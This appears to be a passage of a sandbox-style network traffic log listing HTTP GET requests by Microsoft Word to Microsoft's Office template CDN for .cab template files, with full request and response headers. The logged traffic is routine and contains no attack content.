    Content-MD5: 2jOARYFw5gy+pyYC/dDZVQ==
    Last-Modified: Fri, 22 Apr 2016 15:41:23 GMT
    ETag: 0x8D36AC48EC98375
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: d064db8e-b01e-0097-7097-a05ba0000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0309043402.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 723359
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: dIpTxr3Vzpe9VKdsejNChg==
    Last-Modified: Wed, 29 Aug 2018 18:14:30 GMT
    ETag: 0x8D60DDB43B59EC5
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 3d093d5b-601e-0153-7197-a05713000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02835233.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 46413
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: xFXEvEvsng2mfE0eU+RtWg==
    Last-Modified: Fri, 22 Apr 2016 16:09:25 GMT
    ETag: 0x8D36AC879BBB45C
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 428c94d7-801e-0139-7097-a08f3b000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851217.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 33610
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: UYBOJVxXMXYDn01bVcEqsg==
    Last-Modified: Fri, 22 Apr 2016 15:41:40 GMT
    ETag: 0x8D36AC499632D1A
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 009251c0-b01e-0139-0e97-a03e98000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851216.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 34816
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: YoYxJM3NoTXswOcieCy4iA==
    Last-Modified: Fri, 22 Apr 2016 16:09:38 GMT
    ETag: 0x8D36AC8813CE0D3
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 01a9fe93-e01e-0020-0397-a0f18d000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851218.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31835
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: kqgZ1DSoquosZfDMLzO7Og==
    Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
    ETag: 0x8D36AC4998BC504
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 76eac56c-801e-00f9-0d97-a0f289000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851219.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31605
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: ae2zv4HJn+ipS7oDQIxa4Q==
    Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
    ETag: 0x8D36AC8822FFB6E
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: cb58b91a-201e-00f4-4797-a041dc000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851220.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31482
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 8Q35ApgPHVvuqWssZoQIpw==
    Last-Modified: Fri, 22 Apr 2016 16:09:40 GMT
    ETag: 0x8D36AC8827914A7
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: f32060e3-b01e-0002-5297-a03492000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851222.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 28911
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: bXh7HiI9trkbaSOAYsyocg==
    Last-Modified: Fri, 22 Apr 2016 16:09:41 GMT
    ETag: 0x8D36AC8830E54C8
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: a51313b9-e01e-0100-5597-a07427000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp1000111502.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 230916
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: k/qfd5Ugqy0irE6oZLe7NA==
    Last-Modified: Thu, 12 Jul 2018 00:23:53 GMT
    ETag: 0x8D5E78DBFB34F04
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: d4301c61-b01e-0122-6697-a0b138000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851221.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31562
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: HW+Oc6BmKkjTMgkKTIyJjw==
    Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
    ETag: 0x8D36AC499FED5FF
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: dacba60e-401e-0105-7097-a08a43000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328905.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 20457
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: TvpI7DB+ry+bNGoHPGf8+w==
    Last-Modified: Fri, 22 Apr 2016 15:41:39 GMT
    ETag: 0x8D36AC498BB27EF
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 3d2d7e33-b01e-0050-7d97-a02761000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851223.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 32833
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: IFr1FgTvlu8ejmAhJUH3Qg==
    Last-Modified: Fri, 22 Apr 2016 16:09:41 GMT
    ETag: 0x8D36AC88357BC32
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: f320610a-b01e-0002-7697-a03492000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851224.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 30957
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 08kDbk4RWegysbTS6dQr8A==
    Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
    ETag: 0x8D36AC883A171B7
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 050425c3-601e-0131-1e97-a09534000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851225.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31008
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 4DPMvHunh6L4JM4JUuV9RA==
    Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
    ETag: 0x8D36AC883F49D7D
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 333d895c-301e-008a-7b97-a0d19b000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851227.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31471
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: karb7EFxz6gpK2GEkvXvNA==
    Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
    ETag: 0x8D36AC8848A0495
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 13033484-101e-00ef-6b97-a07fdf000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851226.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 35519
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: U+6dpJ0LhDVwOOzzdoONLg==
    Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
    ETag: 0x8D36AC88440C433
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 2e8ae1bb-901e-00ce-4f97-a05ba4000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0309043001.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 307348
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: DrxFqg5nzENdB0VDg3H5SA==
    Last-Modified: Wed, 29 Aug 2018 18:20:24 GMT
    ETag: 0x8D60DDC16D93762
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 6b95f26a-601e-0143-7d97-a0927b000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328893.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 20235
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 48ZBc7L0qnq3LhOWqVFL2A==
    Last-Modified: Fri, 22 Apr 2016 15:41:57 GMT
    ETag: 0x8D36AC4A3175138
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 3d2d7caf-b01e-0050-2697-a02761000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03998158.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 42788
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: IaS3txYxwszaX7umN1Hw0g==
    Last-Modified: Fri, 22 Apr 2016 15:41:55 GMT
    ETag: 0x8D36AC4A24B210A
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: da46b32d-701e-0081-5997-a09a3e000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328908.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31083
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: iamBjmZY1zpztkJSL/hwHw==
    Last-Modified: Fri, 22 Apr 2016 16:09:46 GMT
    ETag: 0x8D36AC8865F4922
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 428ca131-801e-0139-0397-a08f3b000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328884.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 22008
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: q78QzulIDkHYEnfpU4+Yyw==
    Last-Modified: Fri, 22 Apr 2016 16:10:17 GMT
    ETag: 0x8D36AC8987823BE
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
